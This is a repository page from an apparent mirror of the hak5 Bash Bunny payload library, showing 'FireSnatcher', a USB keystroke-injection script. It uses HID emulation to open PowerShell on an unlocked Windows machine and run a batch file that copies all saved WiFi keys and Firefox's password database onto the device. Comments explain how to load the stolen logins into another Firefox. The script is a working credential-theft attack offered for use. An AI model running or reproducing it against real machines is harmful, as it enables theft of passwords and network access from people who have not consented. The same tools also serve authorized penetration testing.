hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
bashbunny-payloads/payloads/library/credentials/FireSnatcher/payload.txt
KarrotKak3 f12c486e12
Add files via upload (#518) 
New Payload. FireSnatcher
2022-04-29 18:05:40 -05:00

79 lines
2.0 KiB
Plaintext
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Title: FireSnatcher
# Description: Copies Wifi Keys, and Firefox Password Databases
# Author: KarrotKak3
# Props: saintcrossbow & 0iphor13
# Version: 1.0.2.0 (Work in Progress)
# Category: Credentials
# Target: Windows (Logged in)
# Attackmodes: HID, Storage
# Full Description
# ----------------
# Attacks an Unlocked Windows Machine
# Payload targets:
# - All WiFi creds
# - Firefox Saved Password Database
#
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
# KNOWN ISSUES
# ---------------
# Loot is saved in Payloads/switch#/loot
# Files
# -----
# - payload.txt: Starts the attack. All configuration contained in this file.
# - FireSnatcher.bat: Worker that grabs Creds
# Setup
# -----
# - Place the payload.txt and FireSnatcher.bat in Payload folder
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
# LEDs
# ----
# Magenta: Initial setup about 1 3 seconds
# Single yellow blink: Attack in progress
# Green rapid flash, then solid, then off: Attack complete Bash Bunny may be removed
# Options
# -------
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
BB_NAME="BashBunny"
# Setup
# -----
LED SETUP
# Attack
# ------
ATTACKMODE HID STORAGE
Q DELAY 500
LED ATTACK
Q DELAY 100
Q GUI r
Q DELAY 100
Q STRING powershell Start-Process powershell
Q ENTER
Q DELAY 7000
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"
Q ENTER
Q DELAY 8000
Q STRING EXIT
Q ENTER
sync
LED FINISH
Q DELAY 1500
shutdown now
Reference in New Issue View Git Blame Copy Permalink